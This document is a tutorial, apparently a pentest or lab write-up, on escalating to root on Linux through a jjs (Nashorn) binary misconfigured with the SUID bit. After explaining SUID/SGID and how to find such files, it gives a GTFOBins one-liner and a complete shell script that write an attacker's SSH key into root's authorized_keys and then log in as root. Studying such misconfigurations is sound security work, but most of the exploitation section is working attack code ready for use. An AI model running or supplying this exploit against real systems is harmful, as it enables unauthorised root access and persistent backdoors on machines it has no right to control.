Description: JJS is an acronym for ‘Java JavaScript’. jjs is the command-line tool that invokes the ‘Nashorn’ engine; it is the recommended tool and was created specifically for Nashorn. To evaluate a script file using Nashorn, pass the name of the script file to the
What is the Nashorn engine?
- Nashorn is the JavaScript engine that shipped with the JDK (added in Java 8, removed in Java 15). It lets a developer add scripting support to an application, so the end user can modify behaviour quickly without recompiling the whole Java application.
How is it possible?
Privilege escalation becomes possible when the jjs binary has the SUID or SGID bit set. jjs executes whatever JavaScript it is given, and with SUID set that script runs with the effective UID of the file’s owner (typically root), so it can read and write files and run commands as that owner. It is a misconfigured permission on the binary, not a bug in Nashorn, that leads to privilege escalation.
What is SUID?
SUID (Set owner User ID upon execution) is a special permission bit on an executable file. Normally, when a program runs on Linux/Unix it inherits the access permissions of the user who started it. With SUID set, the program runs with the effective user ID of the file’s owner rather than that of the user who runs it, so for the lifetime of that process the user has the owner’s privileges (the GID is unaffected; that is what SGID controls). When the owner is root, any file write or command the program performs happens as root.
What is SGID?
SGID (Set Group ID upon execution) is the group counterpart of SUID. On an executable file it makes the process run with the effective group ID of the file’s group rather than the caller’s group, so the caller temporarily has that group’s permissions. On a directory it instead makes newly created files inherit the directory’s group.
SGID works like SUID; the difference is that SUID assumes the file owner’s identity while SGID assumes the file group’s identity, instead of the permissions the logged-in user would normally inherit.
How to identify?
Run an enumeration script such as LinEnum.sh or linpeas.sh, or search manually: “find / -perm -4000 -type f 2>/dev/null” for SUID files and “find / -perm -2000 -type f 2>/dev/null” for SGID files. The older “-perm +4000” syntax is rejected by current GNU find; use “-perm -4000” or “-perm /4000” instead. If jjs shows up in the output, it is a candidate.
Time to exploit!!!
I found a very effective and great script written by “gtfobins”; link given below.
Basically we use the GTFOBins one-liner to make the SUID jjs write our SSH public key into the ‘/root/.ssh’ folder; because jjs runs as root, the write succeeds even though /root is not readable by our user.
echo 'var FileWriter = Java.type("java.io.FileWriter"); var fw=new FileWriter("/root/.ssh/authorized_keys"); fw.write("<public key>"); fw.close();' | jjs
Copy the line above into a file named “test.sh”, replacing <public key> with the contents of your own public key (for example the id_rsa.pub generated by ssh-keygen), and execute “test.sh” on the target machine. Note that this FileWriter call truncates any existing authorized_keys file and expects /root/.ssh to exist already.
Log in with your private key. This requires sshd to allow root to authenticate with a key (PermitRootLogin yes or prohibit-password).
- Syntax: ssh -i <private key> username@host-ip
- Example: ssh -i id_rsa root@<host-ip>
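The identification and exploitation steps above put together as one script. This is an added example, not the original post’s test.sh or the GTFOBins one-liner: it assumes the jjs binary is at the path found by command -v jjs (or is passed as the second argument), that the attacker’s public key was generated with ssh-keygen into ~/.ssh/id_ed25519.pub, and that root is allowed to log in over SSH with a key. It goes slightly beyond the one-liner in that it creates /root/.ssh if missing and appends to authorized_keys instead of overwriting it.

```sh
#!/bin/sh
# Added example, not from the original post or from GTFOBins: find SUID/SGID
# files, confirm that jjs carries the SUID bit, and push an SSH public key into
# root's authorized_keys through Nashorn. All paths below are assumptions.

# Enumerate setuid (-4000) and setgid (-2000) regular files under a root.
# "-perm -4000" is the portable spelling; "+4000" is rejected by current GNU find.
find_suid_sgid() {
    find "${1:-/}" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null
}

# Returns 0 if the setuid bit is set on the given file ([ -u ] is POSIX).
is_suid() {
    [ -u "$1" ]
}

# Emit the Nashorn script. Differences from the one-liner in the post:
#   - File.mkdirs() creates /root/.ssh if it is missing (FileWriter will not);
#   - FileWriter(path, true) appends, so existing keys are kept;
#   - the key line is newline-terminated, which sshd requires.
build_payload() {
    key="$1"
    target="${2:-/root/.ssh/authorized_keys}"
    dir="${target%/*}"
    printf '%s' "var File = Java.type(\"java.io.File\"); new File(\"$dir\").mkdirs(); var FileWriter = Java.type(\"java.io.FileWriter\"); var fw = new FileWriter(\"$target\", true); fw.write(\"$key\\n\"); fw.close();"
}

# Run the payload through jjs. Refuses to continue when jjs is not SUID,
# because then the write would happen as the unprivileged caller and fail.
exploit() {
    key_file="${1:-$HOME/.ssh/id_ed25519.pub}"   # assumed: generated with ssh-keygen
    jjs_bin="${2:-$(command -v jjs)}"
    if ! is_suid "$jjs_bin"; then
        echo "$jjs_bin does not have the SUID bit; nothing to escalate" >&2
        return 1
    fi
    build_payload "$(cat "$key_file")" | "$jjs_bin"
}

# Usage on the target, from the low-privileged shell:
#   find_suid_sgid / | grep jjs
#   exploit ~/.ssh/id_ed25519.pub /usr/bin/jjs
#   ssh -i ~/.ssh/id_ed25519 root@<target-ip>
```

The SUID check before running the payload matters: jjs is often installed as a plain, non-SUID binary, in which case the same script simply fails with a permission error on /root/.ssh and tells you nothing, whereas the check makes the missing precondition explicit.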
We have successfully exploited the misconfigured (SUID) ‘jjs’ binary and obtained a root shell over SSH.